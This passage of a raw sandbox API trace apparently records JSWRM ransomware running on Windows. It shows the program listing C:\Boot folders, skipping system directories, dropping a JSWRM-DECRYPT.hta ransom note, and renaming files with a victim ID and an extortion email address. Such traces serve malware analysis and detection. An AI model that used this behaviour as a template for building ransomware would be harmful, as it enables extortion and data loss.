(lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0064.319] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0064.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0064.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0064.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0064.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0064.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.319] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0064.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0064.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0064.319] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0064.319] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0064.319] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0064.319] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0064.319] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0064.319] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0064.319] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="recovery") returned -1 [0064.319] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="perflogs") returned -1 [0064.319] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="documents and settings") returned 1 [0064.320] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.320] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="system volume information") returned -1 [0064.320] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="msocache") returned -1 [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0064.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="memtest.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memtest.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0064.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.320] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.320] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.320] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9785103733670168) returned 0 [0064.320] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.320] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.320] CloseHandle (hObject=0xffffffff) returned 1 [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0064.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.320] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.320] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0064.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0064.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0064.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0064.321] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.321] MoveFileW (lpExistingFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui"), lpNewFileName="C:\\Boot\\sr-Latn-CS\\memtest.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\sr-latn-cs\\memtest.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0064.321] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0x5168548b, ftLastAccessTime.dwHighDateTime=0x1d3271b, ftLastWriteTime.dwLowDateTime=0xe318f070, ftLastWriteTime.dwHighDateTime=0x1d112e1, nFileSizeHigh=0x0, nFileSizeLow=0xaf58, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0064.321] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0064.321] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.321] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc495eef9, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="sr-Latn-RS", cAlternateFileName="SR-LAT~2")) returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2=".") returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="..") returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="...") returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="windows") returned -1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="recovery") returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="perflogs") returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="documents and settings") returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="$RECYCLE.BIN") returned 1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="system volume information") returned -1 [0064.321] lstrcmpiW (lpString1="sr-Latn-RS", lpString2="msocache") returned 1 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0064.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233028 [0064.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.322] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-RS\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sr-latn-rs\\jswrm-decrypt.hta")) returned 0xffffffff [0064.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0064.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.322] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0064.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0064.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0064.322] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x233028 [0064.322] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0064.322] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sr-latn-rs\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0064.322] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0064.323] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0064.323] CloseHandle (hObject=0x450) returned 1 [0064.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0064.324] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0064.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0064.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0064.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0064.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232c80 [0064.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0064.325] GetFileAttributesW (lpFileName="C:\\Boot\\sr-Latn-RS\\JSWRM-DECRYPT.hta" (normalized: "c:\\boot\\sr-latn-rs\\jswrm-decrypt.hta")) returned 0x20 [0064.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0064.325] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.325] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.325] FindFirstFileW (in: lpFileName="C:\\Boot\\sr-Latn-RS\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1d008a68, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0064.325] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.325] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x1d008a68, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0064.326] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.326] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.326] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc495eef9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc495eef9, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d60, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="recovery") returned -1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="perflogs") returned -1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="documents and settings") returned -1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$RECYCLE.BIN") returned 1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="system volume information") returned -1 [0064.326] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="msocache") returned -1 [0064.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0064.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f610, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0064.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0064.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bootmgr.exe.mui", cchWideChar=15, lpMultiByteStr=0x345f5e0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 15 [0064.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0064.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0064.326] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0064.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0064.326] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0064.326] CreateFileW (lpFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0064.327] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9782458033815216) returned 0 [0064.327] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0064.327] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0064.327] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0064.327] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0064.327] CloseHandle (hObject=0xffffffff) returned 1 [0064.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0064.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0064.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0064.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0064.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0064.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0064.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0064.328] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0064.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0064.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2266b0 [0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0064.328] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2266b0 | out: hHeap=0x1e0000) returned 1 [0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0064.328] MoveFileW (lpExistingFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui"), lpNewFileName="C:\\Boot\\sr-Latn-RS\\bootmgr.exe.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\sr-latn-rs\\bootmgr.exe.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0064.328] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 